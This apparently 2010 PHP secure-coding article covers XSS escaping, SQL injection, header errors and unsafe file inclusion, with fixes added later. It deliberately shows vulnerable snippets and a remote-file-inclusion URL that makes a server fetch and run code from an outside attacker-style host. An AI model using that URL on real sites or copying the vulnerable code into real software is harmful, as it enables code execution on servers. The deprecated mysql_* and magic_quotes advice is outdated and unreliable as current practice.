Free Php Scripts, Articles and Resources
Date: 13 March 2010
10 most common problems and mistakes done by PHP coders

1. Not escaping entities

It's basic knowledge: ALL untrusted input (especially user input from forms) has to be sanitized before it is output.

echo $_GET['username'];


can, for instance, output whatever the visitor placed in the parameter, such as:
/* snooping cookie or changing admin password script */

It is an obvious security risk not to sanitize untrusted data before output. Besides, you might end up with pages looking very messy if you do not treat user input the right way.


How to fix it:

Basically you need to convert <, >, ' and " to their HTML entities (&lt;, &gt;, &#039; and &quot;). The functions htmlspecialchars() and htmlentities() do the work.

So here is the right way:

echo htmlspecialchars($_GET['username'], ENT_QUOTES);

Countless scripts carry this problem.
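The unescaped echo from above beside its escaped form, rendered into both a text node and an attribute value. This is an added example, not code from the original article; e(), renderUnsafe() and renderSafe() are names chosen here.

```php
<?php
// Added example (not from the original article): the unescaped echo beside the
// escaped version, rendered into both a text node and an attribute value.
// e(), renderUnsafe() and renderSafe() are names chosen here.
declare(strict_types=1);

// HTML-escape for output. ENT_QUOTES covers single quotes as well as double,
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the string, and
// the explicit charset avoids relying on default_charset.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// What the article warns against: raw input straight into the markup.
function renderUnsafe(string $username): string
{
    return '<input name="username" value="' . $username . '">'
         . '<p>Welcome, ' . $username . '</p>';
}

// The fix: every interpolation of untrusted data goes through e().
function renderSafe(string $username): string
{
    return '<input name="username" value="' . e($username) . '">'
         . '<p>Welcome, ' . e($username) . '</p>';
}

// Constructed sample input: closes the attribute and opens a new tag.
$untrusted = '"><s>Mallory</s>';
echo renderUnsafe($untrusted), "\n"; // attribute broken, <s> tag is rendered
echo renderSafe($untrusted), "\n";   // &quot;&gt;&lt;s&gt;Mallory&lt;/s&gt; shown as text
```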

2. Not Escaping SQL input

When querying your database, always make sure untrusted data is escaped; otherwise your application will be vulnerable to SQL injection and unreliable. Some coders think they are covered by having magic_quotes on in their php.ini. The problem is that untrusted input can come from sources other than $_GET, $_POST and $_COOKIE (crawling other websites, or data read back from the database). And what happens if magic_quotes is suddenly set to Off?

How to fix it:
I recommend setting magic_quotes to Off in php.ini or via .htaccess, and then using mysql_real_escape_string() on all variables used in SQL expressions.


<?php
// Escape every value before it is embedded in the SQL string.
$sql = "UPDATE users SET
        name = '" . mysql_real_escape_string($name) . "'
        WHERE id = '" . mysql_real_escape_string($id) . "'";
mysql_query($sql);
?>

In PHP 5 combined with MySQL 5 you can also use bindings (prepared statements with bound parameters).

If you leave magic_quotes On you will just have to trust your instinct.
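The same UPDATE done with the bindings the text mentions, as an added example that is not part of the original article. It assumes PDO and uses an in-memory SQLite database in place of MySQL so it runs offline; the statement and binding calls are identical for MySQL.

```php
<?php
// Added example (not from the original article): the UPDATE from the article
// done with PDO prepared statements, so the database driver, not string
// escaping, keeps data and SQL apart.
// Assumption: an in-memory SQLite database stands in for MySQL so this runs
// offline; for MySQL, the same prepare/bind/execute calls apply.
declare(strict_types=1);

function connect(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    ]);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
    $db->exec("INSERT INTO users (id, name) VALUES (1, 'alice'), (2, 'bob')");
    return $db;
}

// Updates one user's name. Both values travel as parameters, never as SQL text.
function updateUserName(PDO $db, int $id, string $name): int
{
    $stmt = $db->prepare('UPDATE users SET name = :name WHERE id = :id');
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

$db = connect();
// Constructed hostile input: with naive concatenation this would close the
// string and start a second statement; as a bound parameter it is just a name.
$hostile = "x'; DELETE FROM users; --";
updateUserName($db, 1, $hostile);

$rows = $db->query('SELECT id, name FROM users ORDER BY id')->fetchAll(PDO::FETCH_ASSOC);
var_dump(count($rows) === 2);            // bool(true): nothing was deleted
var_dump($rows[0]['name'] === $hostile); // bool(true): stored literally, quote included
```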

3. Wrong use of HTTP-header related functions: header(), session_start(), setcookie()

Have you ever encountered this warning? "Warning: Cannot add header information - headers already sent [...]"

Most likely you have, either during development or when deploying PHP applications. When your browser downloads a web page, the response from the server is structured in two parts: the header part and the content part.

The header consists of data that is not visible, such as cookies to be set or whether the browser should redirect to another location. The header always comes first.

The content part consists of the visible content: HTML, image data and so on.

If output_buffering is set to Off in php.ini, all header-related functions (setcookie(), header(), session_start()) must be called before the script produces any output. The problem arises when somebody develops on one platform configuration and deploys to another: suddenly redirects stop working, and cookies and sessions are not being stored...

How to fix it:
The right way is actually very simple: make your script call all header-related functions before you start any output, and set output_buffering = Off in php.ini on your development platform so that such mistakes show up early. If this is a problem on existing scripts you can always hack about with the output control functions.

4. Requiring and including files using untrusted data

Again and again: do not trust data you did not declare yourself. Including and requiring files based on $_GET, $_POST and $_COOKIE (but not limited to those) is a stupid and mortal path; you want to control exactly which code your server executes.

Example:
index.php

<?php
// including header, config, database connection, etc.
include($_GET['filename']);
// including footer
?>

Any hacker can now request the following URL: http://www.yourdomain.com/index.php?filename=anyfile.txt

By doing so the hacker can extract confidential information and execute PHP scripts stored on the server. Now if allow_url_fopen is set to On in your php.ini you will be doomed:

Try this one out:
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

Then your script includes and parses any code that the web page at
http://www.youaredoomed.com/phphack.php outputs. Doing so he can for instance send spam mails, change passwords, delete files... I have a very limited imagination.

How to fix it:
You have to control which files the script is allowed to include and which it is not allowed to include.


Note: this is only a quick fix:

<?php
// Include only files that are on the allowlist.
$allowedFiles = array('file1.txt', 'file2.txt', 'file3.txt');
if (in_array((string)$_GET['filename'], $allowedFiles)) {
    include($_GET['filename']);
} else {
    exit('not allowed');
}
?>
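A more complete version of the same idea, added here and not part of the original article: the request supplies only a key into a fixed map, so no file name or path from the client ever reaches include. PAGES_DIR, PAGE_MAP and resolvePage() are names and a directory layout assumed for the example.

```php
<?php
// Added example (not from the original article): the page parameter selects a
// key in a fixed map, so the request never supplies a file name or path.
// PAGES_DIR, PAGE_MAP and resolvePage() are names and layout assumed here.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';   // assumed: all includable pages live here
const PAGE_MAP  = [                     // request key => file under PAGES_DIR
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null if the key is not allowed.
function resolvePage(string $key): ?string
{
    if (!array_key_exists($key, PAGE_MAP)) {
        return null;                    // unknown key: nothing from the request is used
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGE_MAP[$key]);
    // Belt and braces: even a mapped file must resolve to somewhere under PAGES_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$key  = $_GET['page'] ?? 'home';
$page = is_string($key) ? resolvePage($key) : null;   // array values in $_GET are rejected too
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
include $page;
```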



5. Syntax errors

This covers all the parse and syntax errors YOU make during development; these are probably uncountable, right? Usually it is a bracket, semicolon, quotation mark or parenthesis that is missing or misplaced. It is a time eater, and that is why I have put it on the list. There is only one way to fight it: become aware of which syntax errors you make and find ways to avoid repeating them! Of course a good text editor will help you a lot here; please do not use Notepad.

...

Read the rest of the article here:

http://www.sourcerally.net/regin/8-The-PHP-coder%27s-top-10-mistakes-and-problems

 